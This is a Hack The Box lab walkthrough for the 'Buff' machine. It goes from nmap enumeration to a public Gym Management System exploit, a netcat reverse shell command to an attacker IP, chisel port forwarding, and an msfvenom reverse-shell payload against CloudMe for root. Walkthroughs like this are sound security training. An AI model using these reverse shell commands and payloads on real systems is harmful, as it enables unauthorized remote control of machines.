Hackthebox Buff walkthrough
Enumeration
ِLet`s begain scanning with NMAP
ِTwo ports are open 8080 , 7680
ِAfter opening the webapp at 8080 i found out it`s from ProjectWorld.in
And i searched for the project
https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/
I searched for public exploit for the project and i found this Exploit
Exploiting
Python script
ِWe got in !
ِLet`s upload nc.exe
Let`s get our reverse shell
ِC:\xampp\htdocs\gym\upload> powershell -c ".\nc.exe 10.10.10.10 1234 -e powershell"
ِWe got shell as SHAUN ! , Let`s get the user hash.
USER Flag !
Privilege Escalation
I uploaded WinPEAS.exe and after i ran it i found a vulnerable app called Cloudme.exe,it`s running on 8888 port
I search for an exploit and found these
ِWe need to use portforwarding to run the exploit, you can use CHISEL or PLINK.
It should be compiled to exe to run on windows i used golang
env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w"
You can compile it by this command
After compilt it to exe , let`s upload it
ِI started the server at 8080 on my machine
ِWe need to start Chisel on the victim machine to connect
Exploiting Cloudme
We need to adjust msfvenom cmd to get a shell to our machine
So you to copy this and adjust your Ip address to get your shell "msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python" Exploit
Run your listner on the port you choosed in the payload then run the EXPLOIT ..
ROOT Flag !
